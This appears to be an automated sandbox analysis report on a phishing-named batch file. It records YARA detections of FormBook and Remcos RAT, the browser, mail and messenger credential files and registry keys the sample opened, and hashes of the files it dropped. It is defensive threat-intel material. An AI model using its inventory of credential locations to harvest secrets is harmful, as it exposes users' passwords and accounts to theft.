Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

10_2_23D72264

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

18_2_004082CD

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_0041739B GetVersionExW,

17_2_0041739B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Instant Messenger accounts or passwords

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to steal Mail credentials (via file registry)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: ESMTPPassword	18_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	18_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	18_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Windows Analysis Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1500456
Product:	CloudBasic
Start time:	14:00:09
Start date:	28.08.2024
Sample:	PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a7cf853aab7a489baa2e3fc8e31ab25f
SHA1:	b114e9292f9c733594bc058fbec8f7ed63bfc208
SHA256:	5f6652b2b1984430374890d518550109bcef83b980557b985e502e70e80a7392

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json	JSON data	18BC6D34FABB00C1E30D98E8DAEC814A	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	650442BF25AE2C56DB058CC0066DB72D	17399EA4E4386F13344E6EDE6ED1CD5F54098E16	85004E8DD992D4E1F4AEC60728DAFF66F39B2AA1AE062D2BEBF21E29DBD9899B
C:\Users\user\AppData\Local\Temp\Andragendet8.vbs	ASCII text, with CRLF line terminators	BFC67754721884CC0140E7534EAA0F61	2E59368919AFB98121950C73F03429F530F295B3	388B073997E4C52EC96B4C55EB00667B4C4A4D1A3BEC85431E38C7683D313B45
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22ppql3u.lyk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sfmnaes.4ez.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htykarzd.z00.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgf52erv.xzo.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4uslc30.jt3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb520ipz.cem.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wactrupg.vkn.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\bhv310C.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0	9F6FBA8CABF6D4ECDD5B285F375D352B	ED0D370573441F24C1FEF0F1D7A92DB58AA484D8	4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
C:\Users\user\AppData\Local\Temp\g7Q9039	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\Belinda103.Eft	ASCII text, with very long lines (65536), with no line terminators	57B90FD435B223BE1197BF2C261BC942	D10B30FE2E5A5656DD6E6ED7A3299FFE3CFA4F5C	D798DA8EE8AD968C48094F2C59A3A0F57BE04360D74AD388DFA9E05399E066D9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	1D6D532A510B967815CC9A8663CE8EFF	6E0250DE4AEFAD878B0FE36CE36AF5694110C5D5	80619C905AEB5B94489C9943B346E62899891348AEA70A01AFD0F14609942549
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARZTWOM2N06S30R4R4G5.temp	data	1D6D532A510B967815CC9A8663CE8EFF	6E0250DE4AEFAD878B0FE36CE36AF5694110C5D5	80619C905AEB5B94489C9943B346E62899891348AEA70A01AFD0F14609942549
C:\Users\user\AppData\Roaming\Negligent.Gas	ASCII text, with very long lines (65536), with no line terminators	C307CFEB8434B059E8B0FA985D12DAFD	978BC8A0010D25CB355A4C059BF433EFD8613C32	2C382E87B37C4A9404F3A7B445D2071B9B8EE1CF893998F606188AB3091457D2
C:\Users\user\AppData\Roaming\sfvnspt.dat	data	412DFDB3346CCA6A5A77EBEA0CB0387E	15C20D1C99D6B57574425EA8229E92679E2F9CC8	511D2D85A0C20D2DF2DD14CCC7323E6AE99DF63219931A970A527007CDAC2BFB

Windows Analysis Report PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

Malware Threat Intel
Provided by